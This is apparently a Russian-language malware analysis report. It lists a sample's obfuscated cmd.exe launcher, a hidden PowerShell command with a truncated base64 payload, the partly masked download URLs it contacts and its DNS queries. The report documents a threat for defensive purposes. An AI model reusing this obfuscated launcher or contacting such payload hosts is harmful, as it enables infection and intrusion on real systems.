Техническая информация
- '<SYSTEM32>\cmd.exe' /v /c "set %OtizhkjWc%=qVDYkaKIH&&set %lQiNhTcsY%=p^o^w^e^r^s&&set %vYrlzlNZA%=OjViiNDoK&&set %cPkDqzCEb%=he^l^l&&set %zKvTfDUZa%=DiHjhluYD&&!%lQiNhTcsY%!!%cPkDqzCEb%! ^-^e SQBFAHgA...
- 'ro#t.as':80
- 'bo##-bau.de':80
- 'bo###bau.com':443
- 'ge####valerius.de':80
- http://ro#t.as/ThuahO/
- http://bo##-bau.de/t/
- http://ge####valerius.de/pzZ/
- 'bo###bau.com':443
- DNS ASK fh###argen.de
- DNS ASK ro#t.as
- DNS ASK bo##-bau.de
- DNS ASK bo###bau.com
- DNS ASK ge####valerius.de
- DNS ASK ur#######onstructions.com.au
- '<SYSTEM32>\cmd.exe' /v /c "set %OtizhkjWc%=qVDYkaKIH&&set %lQiNhTcsY%=p^o^w^e^r^s&&set %vYrlzlNZA%=OjViiNDoK&&set %cPkDqzCEb%=he^l^l&&set %zKvTfDUZa%=DiHjhluYD&&!%lQiNhTcsY%!!%cPkDqzCEb%! ^-^e SQBFAHgA...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e SQBFAHgAIAAoACIAJAAoAFMAZQB0AC0ASQB0AGUAbQAgACAAJwBWAEEAcgBJAEEAQgBMAEUAOgBvAGYAcwAnACAAJwAnACAAKQAiACAAKwBbAHMAdABSAGkAbgBnAF0AKAAnADMANgB2ADEAMQA5AHYAMQAxADUAOwA5ADkAJgAxADEANABfADEAMAA1AH...